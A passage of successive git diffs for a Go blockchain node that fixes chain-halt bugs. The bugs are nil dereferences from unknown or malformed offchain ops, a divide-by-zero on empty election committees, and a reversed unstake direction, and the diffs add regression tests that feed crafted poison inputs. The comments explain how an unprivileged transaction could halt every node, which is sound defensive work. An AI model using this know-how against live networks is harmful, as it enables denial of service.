+		VersionProposals: []consensus_state.VersionProposal{
+			{TargetMajor: 1, TargetConsensus: 2, Proposer: "a", CreationEpoch: 1, ExpiryEpoch: 100},     // == floor → drop (adopted)
+			{TargetMajor: 1, TargetConsensus: 1, Proposer: "b", CreationEpoch: 1, ExpiryEpoch: 100},     // < floor → drop (sub-floor)
+			{TargetMajor: 1, TargetConsensus: 3, Proposer: "c", CreationEpoch: 1, ExpiryEpoch: 5},       // expired (5 <= epoch 10) → drop
+			{TargetMajor: 1, TargetConsensus: 4, Proposer: "alice", CreationEpoch: 1, ExpiryEpoch: 100}, // no traction past fast-fail → drop
+			{TargetMajor: 1, TargetConsensus: 5, Proposer: "d", CreationEpoch: 9, ExpiryEpoch: 100},     // fresh (within fast-fail) → keep
+		},
+	})
+	te := newTestEnvWithConsensus(mem, nil)
+	te.processAndWait() // load cache from mem
+
+	// Ratified election: epoch 10, floor 1.2 (members announce only the floor, so no
+	// member meets target 1.4 → that candidate has no traction).
+	elec := versionedElection(100, 10, 1, 2)
+	te.SE.PruneVersionProposalsAfterElection(elec)
+
+	st := mem.Snapshot()
+	assert.Nil(t, st.ForcedActivation, "adopted forced override cleared")
+	require.Len(t, st.VersionProposals, 1, "only the fresh, still-viable candidate survives")
+	assert.Equal(t, "d", st.VersionProposals[0].Proposer)
+	assert.Equal(t, uint64(5), st.VersionProposals[0].TargetConsensus)
 }

--- a/modules/state-processing/f13_empty_election_test.go
+++ b/modules/state-processing/f13_empty_election_test.go
@@ -1,0 +1,31 @@
+package state_engine_test
+
+// F13 — empty/sub-MinMembers election → slot % len(members) divide-by-zero halt.
+// FIX: GenerateSchedule guards an empty witness list and returns an empty
+// schedule (= no producer this round) instead of panicking on every node.
+// Red→green: before the guard this panicked with "integer divide by zero".
+
+import (
+	"testing"
+
+	stateEngine "vsc-node/modules/state-processing"
+)
+
+func TestF13_EmptyWitnessListDoesNotPanic(t *testing.T) {
+	var seed [32]byte // deterministic zero seed is fine for this guard test
+
+	var panicVal interface{}
+	var sched []stateEngine.WitnessSlot
+	func() {
+		defer func() { panicVal = recover() }()
+		sched = stateEngine.GenerateSchedule(100, []stateEngine.Witness{}, seed)
+	}()
+
+	if panicVal != nil {
+		t.Fatalf("F13 REGRESSION: GenerateSchedule panicked on empty witness list (%v) — div-by-zero halt path open", panicVal)
+	}
+	if len(sched) != 0 {
+		t.Fatalf("F13: expected empty schedule for empty witness list, got %d slots", len(sched))
+	}
+	t.Log("F13 FIXED: empty witness list yields empty schedule, no divide-by-zero panic")
+}

--- a/modules/state-processing/f4_nil_op_chain_halt_test.go
+++ b/modules/state-processing/f4_nil_op_chain_halt_test.go
@@ -1,0 +1,158 @@
+package state_engine_test
+
+// F4 — unprivileged nil-op permanent chain-halt — FIX VERIFICATION (red→green)
+//
+// ORIGINAL BUG (devnet-confirmed): an offchain tx whose op.Type is not one of
+// the five handled cases in OffchainTransaction.ToTransaction() (call /
+// transfer / withdraw / stake_hbd / unstake_hbd) left a nil VSCTransaction in
+// the output slice. That nil was dereferenced (v.Type()) in Ingest /
+// ExecuteBatch — panicking ProcessBlock on EVERY node that ingests the block,
+// halting the chain. (See tests/devnet PoC for the multi-node halt.)
+//
+// FIX (current behavior asserted below): ToTransaction returns an ERROR the
+// moment any op can't be executed exactly as submitted — an unknown op.Type, OR
+// an F21 CBOR decode failure on the attacker-controlled op.Payload. The callers
+// then fail the ENTIRE transaction (TxPacket.Invalid → ExecuteBatch marks it
+// FAILED, charges a fixed RC, executes no op). No op is ever dropped, no nil is
+// produced, and an invalid tx is never reported as a CONFIRMED no-op.
+// Deterministic: invalidity is a pure function of the content-addressed bytes.
+
+import (
+	"testing"
+
+	"vsc-node/modules/common"
+	transactionpool "vsc-node/modules/transaction-pool"
+
+	stateEngine "vsc-node/modules/state-processing"
+)
+
+// validPayload encodes a dag-cbor op payload the way a real client would, so
+// DecodeTxCbor succeeds and the op routes to its concrete VSCTransaction type.
+func validPayload(t *testing.T, fields map[string]interface{}) []byte {
+	t.Helper()
+	b, err := common.EncodeDagCbor(fields)
+	if err != nil {
+		t.Fatalf("encode payload: %v", err)
+	}
+	return b
+}
+
+// TestF4_UnknownOpFailsWholeTx: an unknown op.Type makes ToTransaction return an
+// error (whole tx is invalid) and NO ops — never a nil entry, never a silent drop.
+func TestF4_UnknownOpFailsWholeTx(t *testing.T) {
+	tx := &stateEngine.OffchainTransaction{}
+	tx.Tx = []transactionpool.VSCTransactionOp{
+		{Type: "consensus_stake", Payload: []byte{}}, // unknown off-chain type
+	}
+	tx.Headers.RequiredAuths = []string{"hive:alice"}
+
+	ops, err := tx.ToTransaction()
+	if err == nil {
+		t.Fatal("F4 REGRESSION: unknown op did not fail the tx (err == nil) — halt path open")
+	}
+	if ops != nil {
+		t.Fatalf("F4: expected no ops on invalid tx, got %d", len(ops))
+	}
+}
+
+// TestF4_ValidPlusInvalidFailsWholeTx: the key atomicity property — a VALID
+// transfer alongside an unknown op must NOT yield an executable transfer. The
+// whole tx errors out; nothing is returned to execute.
+func TestF4_ValidPlusInvalidFailsWholeTx(t *testing.T) {
+	tx := &stateEngine.OffchainTransaction{}
+	tx.Tx = []transactionpool.VSCTransactionOp{
+		{Type: "transfer", Payload: validPayload(t, map[string]interface{}{
+			"from": "hive:alice", "to": "hive:bob", "amount": "1.000", "asset": "hbd",
+		})}, // a perfectly valid op...
+		{Type: "consensus_stake", Payload: []byte{}}, // ...next to an unknown one
+	}
+	tx.Headers.RequiredAuths = []string{"hive:alice"}
+
+	ops, err := tx.ToTransaction()
+	if err == nil {
+		t.Fatal("F4 ATOMICITY: tx with one invalid op must fail entirely (err == nil)")
+	}
+	if ops != nil {
+		t.Fatalf("F4 ATOMICITY REGRESSION: %d op(s) returned — the valid transfer must NOT survive", len(ops))
+	}
+}
+
+// TestF4_ValidTxResolvesAllOpsNoNil: a fully valid multi-op tx resolves cleanly
+// (no error) and contains no nil entry, so the ExecuteBatch/Ingest Type() loops
+// that previously panicked complete normally.
+func TestF4_ValidTxResolvesAllOpsNoNil(t *testing.T) {
+	tx := &stateEngine.OffchainTransaction{}
+	tx.Tx = []transactionpool.VSCTransactionOp{
+		{Type: "transfer", Payload: validPayload(t, map[string]interface{}{
+			"from": "hive:alice", "to": "hive:bob", "amount": "1.000", "asset": "hbd",
+		})},
+		{Type: "transfer", Payload: validPayload(t, map[string]interface{}{
+			"from": "hive:alice", "to": "hive:carol", "amount": "2.000", "asset": "hbd",
+		})},
+	}
+	tx.Headers.RequiredAuths = []string{"hive:alice"}
+
+	ops, err := tx.ToTransaction()
+	if err != nil {
+		t.Fatalf("F4: valid tx unexpectedly failed to resolve: %v", err)
+	}
+	if len(ops) != 2 {
+		t.Fatalf("F4: expected 2 resolved ops, got %d", len(ops))
+	}
+	for i, v := range ops {
+		if v == nil {
+			t.Fatalf("F4 REGRESSION: nil VSCTransaction at idx %d", i)
+		}
+		_ = v.Type() // mirrors Ingest / ExecuteBatch
+	}
+}
+
+// TestF4_ReachabilityOpTypeNotValidatedInTxPool documents that the tx-pool
+// itself still has no op-type allowlist (StaticMaxRcCost costs unknown ops via
+// the default branch). That is fine post-fix: the poison op now fails the whole
+// tx at ToTransaction instead of nil→panic. This test stays to flag that the
+// pool layer is NOT the defense — the deterministic state-processing layer is.
+func TestF4_ReachabilityOpTypeNotValidatedInTxPool(t *testing.T) {
+	ops := []transactionpool.VSCTransactionOp{
+		{Type: "consensus_stake", Payload: []byte{}},
+	}
+	cost := transactionpool.StaticMaxRcCost(ops)
+	if cost == 0 {
+		t.Fatal("F4 reachability: StaticMaxRcCost returned 0 for unknown op — unexpected")
+	}
+	t.Logf("F4 NOTE: tx-pool still has no op-type allowlist (cost=%d); the failure is enforced downstream at ToTransaction, not here", cost)
+}
+
+// TestF21_BadPayloadFailsWholeTx: a KNOWN op type carrying an empty/malformed
+// CBOR payload must NOT panic DecodeTxCbor (which previously dropped the decode
+// error and dereferenced a nil node in MarshalJSON → chain halt). Post-fix it
+// must fail the entire tx (error, no ops) — never a silently zero-valued op or a
+// CONFIRMED no-op. op.Payload is attacker-controlled.
+func TestF21_BadPayloadFailsWholeTx(t *testing.T) {
+	for _, opType := range []string{"transfer", "withdraw", "stake_hbd", "unstake_hbd", "call"} {
+		tx := &stateEngine.OffchainTransaction{}
+		tx.Tx = []transactionpool.VSCTransactionOp{
+			{Type: opType, Payload: []byte{}}, // empty/malformed payload
+		}
+		tx.Headers.RequiredAuths = []string{"hive:alice"}
+
+		var (
+			panicVal interface{}
+			ops      []stateEngine.VSCTransaction
+			err      error
+		)
+		func() {
+			defer func() { panicVal = recover() }()
+			ops, err = tx.ToTransaction()
+		}()
+		if panicVal != nil {
+			t.Fatalf("F21 REGRESSION: ToTransaction panicked on empty-payload %q op: %v", opType, panicVal)
+		}
+		if err == nil {
+			t.Fatalf("F21 (%s): bad payload must fail the whole tx (err == nil)", opType)
+		}
+		if ops != nil {
+			t.Fatalf("F21 (%s): expected no ops on invalid tx, got %d", opType, len(ops))
+		}
+	}
+}

--- a/modules/state-processing/f4_nil_op_chain_halt_test.go
+++ b/modules/state-processing/f4_nil_op_chain_halt_test.go
@@ -21,6 +21,7 @@ import (
 	"testing"
 
 	"vsc-node/modules/common"
+	"vsc-node/modules/common/consensusversion"
 	transactionpool "vsc-node/modules/transaction-pool"
 
 	stateEngine "vsc-node/modules/state-processing"
@@ -46,7 +47,7 @@ func TestF4_UnknownOpFailsWholeTx(t *testing.T) {
 	}
 	tx.Headers.RequiredAuths = []string{"hive:alice"}
 
-	ops, err := tx.ToTransaction()
+	ops, err := tx.ToTransaction(consensusversion.Version{})
 	if err == nil {
 		t.Fatal("F4 REGRESSION: unknown op did not fail the tx (err == nil) — halt path open")
 	}
@@ -68,7 +69,7 @@ func TestF4_ValidPlusInvalidFailsWholeTx(t *testing.T) {
 	}
 	tx.Headers.RequiredAuths = []string{"hive:alice"}
 
-	ops, err := tx.ToTransaction()
+	ops, err := tx.ToTransaction(consensusversion.Version{})
 	if err == nil {
 		t.Fatal("F4 ATOMICITY: tx with one invalid op must fail entirely (err == nil)")
 	}
@@ -92,7 +93,7 @@ func TestF4_ValidTxResolvesAllOpsNoNil(t *testing.T) {
 	}
 	tx.Headers.RequiredAuths = []string{"hive:alice"}
 
-	ops, err := tx.ToTransaction()
+	ops, err := tx.ToTransaction(consensusversion.Version{})
 	if err != nil {
 		t.Fatalf("F4: valid tx unexpectedly failed to resolve: %v", err)
 	}
@@ -123,6 +124,48 @@ func TestF4_ReachabilityOpTypeNotValidatedInTxPool(t *testing.T) {
 	t.Logf("F4 NOTE: tx-pool still has no op-type allowlist (cost=%d); the failure is enforced downstream at ToTransaction, not here", cost)
 }
 
+// TestF14_UnstakeHbdDirectionVersionGated: an offchain "unstake_hbd" op (valid
+// payload) must build a *TxUnstakeHbd (whose ExecuteTx releases stake) ONLY once
+// the chain-active consensus version reaches 0.4.0. Below the line it keeps the
+// legacy 0.3.0 behavior — *TxStakeHbd (the wrong direction, but byte-identical on
+// replay). Proves the F14 fix is gated, not unconditional. Cherry-picked from
+// a1c171d7 and converted from an unconditional fix to the 0.4.0 version gate.
+func TestF14_UnstakeHbdDirectionVersionGated(t *testing.T) {
+	build := func(active consensusversion.Version) stateEngine.VSCTransaction {
+		tx := &stateEngine.OffchainTransaction{}
+		tx.Tx = []transactionpool.VSCTransactionOp{
+			{Type: "unstake_hbd", Payload: validPayload(t, map[string]interface{}{
+				"from": "hive:alice", "to": "hive:alice", "amount": "1.000", "asset": "hbd",
+			})},
+		}
+		tx.Headers.RequiredAuths = []string{"hive:alice"}
+		ops, err := tx.ToTransaction(active)
+		if err != nil {
+			t.Fatalf("F14: valid unstake_hbd unexpectedly failed: %v", err)
+		}
+		if len(ops) != 1 {
+			t.Fatalf("F14: expected 1 element for unstake_hbd, got %d", len(ops))
+		}
+		return ops[0]
+	}
+
+	// Below 0.4.0: legacy behavior — builds TxStakeHbd (staked, the wrong direction).
+	if op := build(consensusversion.Version{Major: 0, Consensus: 3}); op == nil {
+		t.Fatal("F14: nil op below the gate")
+	} else if _, ok := op.(*stateEngine.TxStakeHbd); !ok {
+		t.Fatalf("F14: below 0.4.0 unstake_hbd built %T, expected legacy *TxStakeHbd", op)
+	}
+
+	// At/above 0.4.0: fixed — builds TxUnstakeHbd (releases stake).
+	if op := build(consensusversion.V0_4_0); op == nil {
+		t.Fatal("F14: nil op at the gate")
+	} else if _, ok := op.(*stateEngine.TxUnstakeHbd); !ok {
+		t.Fatalf("F14 REGRESSION: at 0.4.0 unstake_hbd built %T, expected *TxUnstakeHbd (releases stake)", op)
+	} else if got := op.Type(); got != "unstake_hbd" {
+		t.Fatalf("F14: Type() = %q, want unstake_hbd", got)
+	}
+}
+
 // TestF21_BadPayloadFailsWholeTx: a KNOWN op type carrying an empty/malformed
 // CBOR payload must NOT panic DecodeTxCbor (which previously dropped the decode
 // error and dereferenced a nil node in MarshalJSON → chain halt). Post-fix it
@@ -143,7 +186,7 @@ func TestF21_BadPayloadFailsWholeTx(t *testing.T) {
 		)
 		func() {
 			defer func() { panicVal = recover() }()
-			ops, err = tx.ToTransaction()
+			ops, err = tx.ToTransaction(consensusversion.Version{})
 		}()
 		if panicVal != nil {
 			t.Fatalf("F21 REGRESSION: ToTransaction panicked on empty-payload %q op: %v", opType, panicVal)

--- a/modules/state-processing/state_engine.go
+++ b/modules/state-processing/state_engine.go
@@ -1926,6 +1926,22 @@ func (se *StateEngine) ExecuteBatch() {
 	ledgerSession := ledgerSystem.NewSession(se.LedgerState)
 
 	for idx, tx := range se.TxBatch {
+		// Invalid tx (unknown op type / undecodable payload): execute NO op and
+		// mark it FAILED. This is the explicit second failure location for txs
+		// that can't even be resolved — distinct from the per-op ExecuteTx
+		// failure path below. It rides the same oplog finalization as every other
+		// tx (TxOutIds → MakeOplog → SetOutput FAILED). A fixed RC is charged so
+		// the tx isn't free. Deterministic: Invalid/Payer are set identically on
+		// every node from the content-addressed resolve error.
+		if tx.Invalid {
+			if tx.Payer != "" {
+				se.RcMap[tx.Payer] += 50
+			}
+			se.TxOutput[tx.TxId] = TxOutput{Ok: false}
+			se.TxOutIds = append(se.TxOutIds, tx.TxId)
+			continue
+		}
+
 		var opTypes map[string]bool = make(map[string]bool)
 		for _, vscTx := range tx.Ops {
 			opTypes[vscTx.Type()] = true

--- a/modules/state-processing/state_engine.go
+++ b/modules/state-processing/state_engine.go
@@ -811,6 +811,12 @@ func (se *StateEngine) ProcessBlock(block hive_blocks.HiveBlock) {
 							// double-sign that already fired in this same incident
 							// so we don't stack two independent 10% slashes against
 							// CorrelatedSlashCapBps without acknowledging it.
+							// Reason logged symmetrically with the Skip/Stale cases
+							// above so the deterministic rejection is observable
+							// (e.g. "malformed BLS signature") instead of silent.
+							log.Warn("invalid block proposal rejected",
+								"account", cj.RequiredAuths[0], "tx_id", tx.TransactionID,
+								"slot_height", slotInfo.StartHeight, "reason", outcome.Reason)
 							_ = doubleSign
 							slashRes := se.slashForEvidenceIfPolicyAllows(
 								cj.RequiredAuths[0],

--- a/modules/state-processing/system_txs.go
+++ b/modules/state-processing/system_txs.go
@@ -704,6 +704,34 @@ func (tx *TxElectionResult) ExecuteTx(se *StateEngine) {
 			bbytes, _ := dagNode.MarshalJSON()
 			json.Unmarshal(bbytes, &elecResult)
 
+			// GV4-3 fix (defense-in-depth, mirrors the proposer's MinMembers abort
+			// in election-proposer.go HoldElection). The signer-quorum check above
+			// proves the PREVIOUS committee approved this result, but nothing has
+			// validated the NEW committee's size. A sub-MinMembers (e.g. empty)
+			// Members list would be persisted here and then drive
+			// consensus.GenerateSchedule into witnessList[slot % 0] — an integer
+			// divide-by-zero that panic-crashes every validating node (full chain
+			// halt). Reject before StoreElection so the prior committee stays in
+			// charge and the chain keeps producing; the next proposer retries.
+			// A sub-MinMembers election is never valid, so this can never reject a
+			// legitimate election. Version-gated on the 0.4.0 consensus line
+			// (MinMembersGuardActive): the accept/reject decision flips network-wide
+			// only once the election floor reaches 0.4.0, resolved deterministically
+			// from the version ACTIVE at this election's submit height
+			// (ActiveConsensusVersion(tx.Self.BlockHeight) — the outgoing committee's
+			// ResultVersion, on-chain and identical on every node). Below the line the
+			// reject is inert so replay of pre-activation history (mainnet has valid
+			// pre-raise 7-member elections) is byte-identical.
+			if consensusversion.MinMembersGuardActive(se.ActiveConsensusVersion(tx.Self.BlockHeight)) &&
+				len(elecResult.Members) < se.sconf.ConsensusParams().MinMembers {
+				log.Warn("election rejected: sub-MinMembers committee",
+					"epoch", tx.Epoch,
+					"members", len(elecResult.Members),
+					"min_members", se.sconf.ConsensusParams().MinMembers,
+					"proposer", elecResult.Proposer)
+				return
+			}
+
 			// Apply inlined pendulum settlement BEFORE StoreElection so
 			// validatePendulumSettlement's GetElectionByHeight(SnapshotRangeTo)
 			// resolves to the CLOSING committee, not the incoming one. Two

--- a/modules/state-processing/system_txs.go
+++ b/modules/state-processing/system_txs.go
@@ -779,6 +779,13 @@ func (tx *TxElectionResult) ExecuteTx(se *StateEngine) {
 				"new_weight", sumWeights(elecResult.Weights, len(elecResult.Members)),
 				"participation", fmt.Sprintf("%d/%d", realWeight, totalWeight),
 			)
+
+			// Garbage-collect consensus-version proposals against the now-canonical
+			// floor: drop adopted/sub-floor, hard-expired, and no-traction candidates,
+			// and clear an adopted recovery override (deterministic — pure function of
+			// this ratified election + the proposal set). Replaces the never-called
+			// ClearScheduledActivation.
+			se.PruneVersionProposalsAfterElection(elecResult)
 		} else {
 			log.Debug("election failed verification", "epoch", tx.Epoch, "verified", verified, "realWeight", realWeight, "minWeight", minimums)
 		}

--- a/modules/state-processing/system_txs.go
+++ b/modules/state-processing/system_txs.go
@@ -1161,7 +1161,10 @@ func (t *TxProposeBlock) ExecuteTx(se *StateEngine) {
 			}
 			confirmedNonces[keyId].Nonces[tx.Headers.Nonce] = true
 
-			txs, txErr := tx.ToTransaction()
+			// Resolve op builds against the version active at this block's height
+			// (same height threaded into Ingest above) so version-gated op builds
+			// — e.g. the F14 unstake_hbd direction — are deterministic on-chain.
+			txs, txErr := tx.ToTransaction(se.ActiveConsensusVersion(uint64(t.SignedBlock.Headers.Br[1])))
 			if txErr != nil {
 				// The tx contains an op that can't be executed exactly as
 				// submitted (unknown type / undecodable payload). Fail the WHOLE

--- a/modules/state-processing/system_txs.go
+++ b/modules/state-processing/system_txs.go
@@ -1133,11 +1133,26 @@ func (t *TxProposeBlock) ExecuteTx(se *StateEngine) {
 			}
 			confirmedNonces[keyId].Nonces[tx.Headers.Nonce] = true
 
-			txs := tx.ToTransaction()
-			txsToInjest = append(txsToInjest, TxPacket{
-				TxId: tx.Cid().String(),
-				Ops:  txs,
-			})
+			txs, txErr := tx.ToTransaction()
+			if txErr != nil {
+				// The tx contains an op that can't be executed exactly as
+				// submitted (unknown type / undecodable payload). Fail the WHOLE
+				// tx: execute no op, mark it FAILED, and charge the payer a fixed
+				// RC. Deterministic — every node hits the identical resolve error
+				// (RequiredAuths is non-empty here, guaranteed by the guard above).
+				log.Warn("offchain tx invalid; failing entire tx",
+					"id", tx.Cid().String(), "err", txErr)
+				txsToInjest = append(txsToInjest, TxPacket{
+					TxId:    tx.Cid().String(),
+					Invalid: true,
+					Payer:   tx.Headers.RequiredAuths[0],
+				})
+			} else {
+				txsToInjest = append(txsToInjest, TxPacket{
+					TxId: tx.Cid().String(),
+					Ops:  txs,
+				})
+			}
 		} else if txContainer.Type() == "output" {
 			contractOutput, err := txContainer.AsContractOutput()
 			if err != nil {

--- a/modules/state-processing/transactions.go
+++ b/modules/state-processing/transactions.go
@@ -658,6 +658,7 @@ func (t *TxUnstakeHbd) Type() string {
 	return "unstake_hbd"
 }
 
+
 type TxConsensusStake struct {
 	Self TxSelf `json:"-"`
 
@@ -1215,13 +1216,24 @@ func (tx *OffchainTransaction) Ingest(se *StateEngine, vscBlockTxId string, txSe
 	// anchoredOpIdx := int64(txSelf.OpIndex)
 
 	// data := make(map[string]interface{})
-	txs := tx.ToTransaction()
+	// An invalid tx (err != nil) is still recorded — with no ops — so it is
+	// queryable and reaches a terminal status. It is marked FAILED later via the
+	// oplog round-trip driven by ExecuteBatch's TxPacket.Invalid branch, exactly
+	// as every other tx's status is finalized. Resolving zero ops here never
+	// means "success": empty Ops on an invalid tx ride the FAILED path.
+	txs, _ := tx.ToTransaction()
 
 	opTypes := make([]string, 0)
 	opTypesM := make(map[string]bool, 0)
 	opList := make([]transactions.TransactionOperation, 0)
 
 	for idx, v := range txs {
+		// Defense-in-depth: ToTransaction never emits a nil VSCTransaction (it
+		// returns an error instead), but guard here too — v.Type() on a nil
+		// interface is the panic that halted every node in the devnet PoC.
+		if v == nil {
+			continue
+		}
 		op := transactions.TransactionOperation{
 			Type: v.Type(),
 			Data: v.ToData(),
@@ -1258,7 +1270,18 @@ func (tx *OffchainTransaction) TxSelf() TxSelf {
 	return tx.Self
 }
 
-func (tx *OffchainTransaction) ToTransaction() []VSCTransaction {
+// ToTransaction resolves the offchain op list into executable VSCTransactions.
+// It returns an error the moment any op cannot be executed exactly as submitted
+// — an unknown op.Type, or an F4/F21 CBOR decode failure on the (fully
+// attacker-controlled) op.Payload. A non-nil error means the ENTIRE transaction
+// must fail: callers record it FAILED with no op executed (see TxPacket.Invalid
+// and the early-fail branch in ExecuteBatch) rather than partially applying it
+// or — the old bug — silently dropping the op and reporting a CONFIRMED no-op.
+//
+// Determinism: invalidity is a pure function of the content-addressed tx bytes
+// (op.Type string match + CBOR decodability), so every node either resolves the
+// identical op list or fails the identical tx, producing the same block CID.
+func (tx *OffchainTransaction) ToTransaction() ([]VSCTransaction, error) {
 	self := tx.TxSelf()
 	self.RequiredAuths = tx.Headers.RequiredAuths
 
@@ -1272,7 +1295,9 @@ func (tx *OffchainTransaction) ToTransaction() []VSCTransaction {
 				NetId: tx.Headers.NetId,
 			}
 			callTx.Self.OpIndex = idx
-			transactionpool.DecodeTxCbor(op, &callTx)
+			if err := transactionpool.DecodeTxCbor(op, &callTx); err != nil {
+				return nil, fmt.Errorf("op %d (%q): %w", idx, op.Type, err)
+			}
 
 			vtx = callTx
 		case "transfer":
@@ -1280,7 +1305,9 @@ func (tx *OffchainTransaction) ToTransaction() []VSCTransaction {
 				Self:  self,
 				NetId: tx.Headers.NetId,
 			}
-			transactionpool.DecodeTxCbor(op, &transferTx)
+			if err := transactionpool.DecodeTxCbor(op, &transferTx); err != nil {
+				return nil, fmt.Errorf("op %d (%q): %w", idx, op.Type, err)
+			}
 
 			vtx = transferTx
 		case "withdraw":
@@ -1288,7 +1315,9 @@ func (tx *OffchainTransaction) ToTransaction() []VSCTransaction {
 				Self:  self,
 				NetId: tx.Headers.NetId,
 			}
-			transactionpool.DecodeTxCbor(op, &withdrawTx)
+			if err := transactionpool.DecodeTxCbor(op, &withdrawTx); err != nil {
+				return nil, fmt.Errorf("op %d (%q): %w", idx, op.Type, err)
+			}
 
 			vtx = &withdrawTx
 		case "stake_hbd":
@@ -1298,25 +1327,46 @@ func (tx *OffchainTransaction) ToTransaction() []VSCTransaction {
 				NetId: tx.Headers.NetId,
 			}
 
-			transactionpool.DecodeTxCbor(op, &stakeTx)
+			if err := transactionpool.DecodeTxCbor(op, &stakeTx); err != nil {
+				return nil, fmt.Errorf("op %d (%q): %w", idx, op.Type, err)
+			}
 
 			vtx = &stakeTx
 		case "unstake_hbd":
+			// NOTE: offchain unstake_hbd intentionally still builds TxStakeHbd
+			// here (the 0.3.0 behavior — it STAKES instead of releasing). The
+			// direction is wrong, but correcting it changes ledger state on a
+			// VALID input and would fork live 0.3.0 nodes, so the fix (F14, build
+			// TxUnstakeHbd) is deferred to the version-gated 0.4.0 rollout and
+			// lives in its own commit.
 			stakeTx := TxStakeHbd{
-				Self: self,
-
+				Self:  self,
 				NetId: tx.Headers.NetId,
 			}
 
-			transactionpool.DecodeTxCbor(op, &stakeTx)
+			if err := transactionpool.DecodeTxCbor(op, &stakeTx); err != nil {
+				return nil, fmt.Errorf("op %d (%q): %w", idx, op.Type, err)
+			}
 
 			vtx = &stakeTx
+		default:
+			// F4: an unknown op.Type previously left vtx as a nil VSCTransaction
+			// interface, dereferenced (v.Type()) in Ingest/ExecuteBatch and
+			// panicking ProcessBlock on every ingesting node (unprivileged,
+			// network-wide chain halt, devnet-confirmed). An unknown op cannot be
+			// executed as submitted, so fail the entire tx deterministically.
+			return nil, fmt.Errorf("op %d: unknown op type %q", idx, op.Type)
 		}
 
+		// Defense-in-depth: a known case that forgets to set vtx must still fail
+		// the tx, never silently drop the op (a nil here is what halts the chain).
+		if vtx == nil {
+			return nil, fmt.Errorf("op %d (%q): nil transaction produced", idx, op.Type)
+		}
 		output = append(output, vtx)
 	}
 
-	return output
+	return output, nil
 }
 
 func (tx *OffchainTransaction) Type() string {
@@ -1340,5 +1390,5 @@ type VSCTransaction interface {
 
 type VscTxContainer interface {
 	Type() string //Hive, offchain
-	ToTransaction() []VSCTransaction
+	ToTransaction() ([]VSCTransaction, error)
 }

--- a/modules/state-processing/transactions.go
+++ b/modules/state-processing/transactions.go
@@ -658,7 +658,6 @@ func (t *TxUnstakeHbd) Type() string {
 	return "unstake_hbd"
 }
 
-
 type TxConsensusStake struct {
 	Self TxSelf `json:"-"`
 
@@ -1221,7 +1220,10 @@ func (tx *OffchainTransaction) Ingest(se *StateEngine, vscBlockTxId string, txSe
 	// oplog round-trip driven by ExecuteBatch's TxPacket.Invalid branch, exactly
 	// as every other tx's status is finalized. Resolving zero ops here never
 	// means "success": empty Ops on an invalid tx ride the FAILED path.
-	txs, _ := tx.ToTransaction()
+	// Resolve op builds against the version active at the anchored height (same
+	// height used for execution in ExecuteBatch) so the indexed op types match
+	// what actually executes (e.g. F14 unstake_hbd direction).
+	txs, _ := tx.ToTransaction(se.ActiveConsensusVersion(anchoredHeight))
 
 	opTypes := make([]string, 0)
 	opTypesM := make(map[string]bool, 0)
@@ -1281,7 +1283,7 @@ func (tx *OffchainTransaction) TxSelf() TxSelf {
 // Determinism: invalidity is a pure function of the content-addressed tx bytes
 // (op.Type string match + CBOR decodability), so every node either resolves the
 // identical op list or fails the identical tx, producing the same block CID.
-func (tx *OffchainTransaction) ToTransaction() ([]VSCTransaction, error) {
+func (tx *OffchainTransaction) ToTransaction(activeVersion consensusversion.Version) ([]VSCTransaction, error) {
 	self := tx.TxSelf()
 	self.RequiredAuths = tx.Headers.RequiredAuths
 
@@ -1333,12 +1335,32 @@ func (tx *OffchainTransaction) ToTransaction() ([]VSCTransaction, error) {
 
 			vtx = &stakeTx
 		case "unstake_hbd":
-			// NOTE: offchain unstake_hbd intentionally still builds TxStakeHbd
-			// here (the 0.3.0 behavior — it STAKES instead of releasing). The
-			// direction is wrong, but correcting it changes ledger state on a
-			// VALID input and would fork live 0.3.0 nodes, so the fix (F14, build
-			// TxUnstakeHbd) is deferred to the version-gated 0.4.0 rollout and
-			// lives in its own commit.
+			// F14: correct the offchain unstake_hbd direction, version-gated on the
+			// 0.4.0 consensus line (UnstakeHbdDirectionFixActive). Below the line this
+			// case built TxStakeHbd (identical to "stake_hbd"), so an offchain
+			// unstake_hbd STAKED funds instead of releasing them — the wrong
+			// direction. Correcting it changes ledger state on a VALID input, so it
+			// must flip network-wide only once the floor reaches 0.4.0; activeVersion
+			// is resolved by the caller from the op's anchored height
+			// (ActiveConsensusVersion), on-chain and identical on every node, so a
+			// full reindex reproduces historical ledger state. At/above 0.4.0, build
+			// the dedicated TxUnstakeHbd, whose ExecuteTx calls ledgerSession.Unstake.
+			// (The L1 vsc.unstake_hbd path was already correct; only this offchain
+			// path was wrong.)
+			if consensusversion.UnstakeHbdDirectionFixActive(activeVersion) {
+				unstakeTx := TxUnstakeHbd{
+					Self:  self,
+					NetId: tx.Headers.NetId,
+				}
+
+				if err := transactionpool.DecodeTxCbor(op, &unstakeTx); err != nil {
+					return nil, fmt.Errorf("op %d (%q): %w", idx, op.Type, err)
+				}
+
+				vtx = &unstakeTx
+				break
+			}
+
 			stakeTx := TxStakeHbd{
 				Self:  self,
 				NetId: tx.Headers.NetId,
@@ -1390,5 +1412,9 @@ type VSCTransaction interface {
 
 type VscTxContainer interface {
 	Type() string //Hive, offchain
-	ToTransaction() ([]VSCTransaction, error)
+	// ToTransaction resolves the offchain op list into executable VSCTransactions.
+	// activeVersion is the chain-active consensus version at the tx's anchored
+	// height (StateEngine.ActiveConsensusVersion), threaded in so version-gated op
+	// builds (e.g. F14 unstake_hbd direction) resolve deterministically on-chain.
+	ToTransaction(activeVersion consensusversion.Version) ([]VSCTransaction, error)
 }

--- a/modules/state-processing/types.go
+++ b/modules/state-processing/types.go
@@ -8,6 +8,14 @@ import (
 type TxPacket struct {
 	TxId string
 	Ops  []VSCTransaction
+
+	// Invalid marks a transaction that could not be resolved into executable ops
+	// (unknown op type, or an undecodable attacker-controlled payload). Such a tx
+	// executes NO op and is marked FAILED by ExecuteBatch's early-fail branch.
+	// Payer (RequiredAuths[0]) is charged a fixed RC so an invalid tx isn't free.
+	// Set only on the offchain ingest path; the L1 path leaves both zero-valued.
+	Invalid bool
+	Payer   string
 }
 
 type TxOutput struct {

--- a/modules/transaction-pool/utils.go
+++ b/modules/transaction-pool/utils.go
@@ -2,6 +2,7 @@ package transactionpool
 
 import (
 	"encoding/json"
+	"fmt"
 	"vsc-node/modules/common"
 	"vsc-node/modules/db/vsc/transactions"
 
@@ -37,9 +38,21 @@ func HashKeyAuths(keyAuths []string) string {
 	}
 }
 
+// F21 fix: previously the decode error was dropped and `node` (nil on an
+// empty/malformed, attacker-controlled payload) was dereferenced by MarshalJSON
+// → panic → chain halt, exactly as the unknown-op F4 did. Return the error
+// instead. ToTransaction now propagates it by failing the ENTIRE transaction
